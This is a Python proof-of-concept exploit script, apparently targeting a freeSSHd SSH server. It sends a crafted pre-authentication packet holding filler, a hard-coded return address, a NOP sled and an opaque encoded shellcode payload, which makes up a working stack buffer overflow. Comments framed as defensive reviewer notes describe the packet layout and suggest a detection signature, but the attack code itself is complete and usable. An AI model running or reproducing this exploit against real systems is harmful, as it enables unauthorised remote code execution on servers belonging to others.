Freesshd.py
#!/usr/bin/python
import socket, sys
import time
# Proof-of-concept that sends one oversized, pre-authentication message to an
# SSH service on TCP port 22 of the host given as the first command-line
# argument. The file name suggests a freeSSHd server is the intended target;
# the listing itself names no product version or advisory id.
#
# Reviewer notes (defensive):
#   * Everything below happens before any authentication: one connect, one
#     banner read, one send of roughly 24 KB, then close.
#   * On the wire this is a client identification string followed directly by
#     a single very large packet whose body is mostly 0x41 bytes, with a short
#     0x90 run in between. That shape is unusual for a real SSH client and is a
#     reasonable basis for a network or IDS signature.
#   * Python 2 syntax (`print` statement, byte-valued str literals).
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((sys.argv[1],22))
# First 21 bytes decode to the ASCII banner "SSH-1.99-OpenSSH_3.4\n".
# The bytes after it read like an SSH binary packet header: a 4-byte length
# (0x00004f04), a padding-length byte (0x05) and message type 0x14, which is
# SSH_MSG_KEXINIT in RFC 4253. The rest is zero bytes ending in 0x07de.
# NOTE(review): presumably a cookie plus an oversized name-list length; confirm.
buffer = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" \
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
# 1055 bytes of filler placed ahead of the value the author labels as the
# return address.
buffer += "A"*1055
# Hard-coded 4-byte value the author labels as the return address.
# NOTE(review): a fixed address implies dependence on one specific memory
# layout on the target; the listing does not say which one.
buffer += "\x0a\xaf\xd5\x77"
buffer += "AAAA" #not necessary
# Author's label: "the ESP". 20 bytes of 0x90 (the x86 NOP opcode) precede the
# payload.
buffer += "\x90"*20
# Opaque binary payload. Its behaviour cannot be determined from this listing
# and it is not described anywhere in the file.
# NOTE(review): treat as unknown machine code; analyse only in an isolated
# sandbox.
buffer +=("\xba\x67\x49\xa4\xac\xda\xc2\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x56\x83\xc3\x04\x31\x53\x0f\x03\x53\x68\xab\x51\x50\x9e\xa2"
"\x9a\xa9\x5e\xd5\x13\x4c\x6f\xc7\x40\x04\xdd\xd7\x03\x48\xed"
"\x9c\x46\x79\x66\xd0\x4e\x8e\xcf\x5f\xa9\xa1\xd0\x51\x75\x6d"
"\x12\xf3\x09\x6c\x46\xd3\x30\xbf\x9b\x12\x74\xa2\x53\x46\x2d"
"\xa8\xc1\x77\x5a\xec\xd9\x76\x8c\x7a\x61\x01\xa9\xbd\x15\xbb"
"\xb0\xed\x85\xb0\xfb\x15\xae\x9f\xdb\x24\x63\xfc\x20\x6e\x08"
"\x37\xd2\x71\xd8\x09\x1b\x40\x24\xc5\x22\x6c\xa9\x17\x62\x4b"
"\x51\x62\x98\xaf\xec\x75\x5b\xcd\x2a\xf3\x7e\x75\xb9\xa3\x5a"
"\x87\x6e\x35\x28\x8b\xdb\x31\x76\x88\xda\x96\x0c\xb4\x57\x19"
"\xc3\x3c\x23\x3e\xc7\x65\xf0\x5f\x5e\xc0\x57\x5f\x80\xac\x08"
"\xc5\xca\x5f\x5d\x7f\x91\x37\x92\xb2\x2a\xc8\xbc\xc5\x59\xfa"
"\x63\x7e\xf6\xb6\xec\x58\x01\xb8\xc7\x1d\x9d\x47\xe7\x5d\xb7"
"\x83\xb3\x0d\xaf\x22\xbb\xc5\x2f\xca\x6e\x49\x60\x64\xc0\x2a"
"\xd0\xc4\xb0\xc2\x3a\xcb\xef\xf3\x44\x01\x86\x33\x8b\x71\xcb"
"\xd3\xee\x85\xfa\x7f\x66\x63\x96\x6f\x2e\x3b\x0e\x52\x15\xf4"
"\xa9\xad\x7f\xa8\x62\x3a\x37\xa6\xb4\x45\xc8\xec\x97\xea\x60"
"\x67\x63\xe1\xb4\x96\x74\x2c\x9d\xd1\x4d\xa7\x57\x8c\x1c\x59"
"\x67\x85\xf6\xfa\xfa\x42\x06\x74\xe7\xdc\x51\xd1\xd9\x14\x37"
"\xcf\x40\x8f\x25\x12\x14\xe8\xed\xc9\xe5\xf7\xec\x9c\x52\xdc"
"\xfe\x58\x5a\x58\xaa\x34\x0d\x36\x04\xf3\xe7\xf8\xfe\xad\x54"
"\x53\x96\x28\x97\x64\xe0\x34\xf2\x12\x0c\x84\xab\x62\x33\x29"
"\x3c\x63\x4c\x57\xdc\x8c\x87\xd3\xec\xc6\x85\x72\x65\x8f\x5c"
"\xc7\xe8\x30\x8b\x04\x15\xb3\x39\xf5\xe2\xab\x48\xf0\xaf\x6b"
"\xa1\x88\xa0\x19\xc5\x3f\xc0\x0b")
# 23000 more filler bytes and a CRLF bring the message to roughly 24 KB.
buffer += "A" * 23000
buffer += "\r\n"
# Read and print up to 1024 bytes of whatever the server sends first
# (normally its identification banner), then transmit the message in one call.
print sock.recv(1024)
sock.send(buffer)
# Wait three seconds before closing the connection.
time.sleep(3)
sock.close()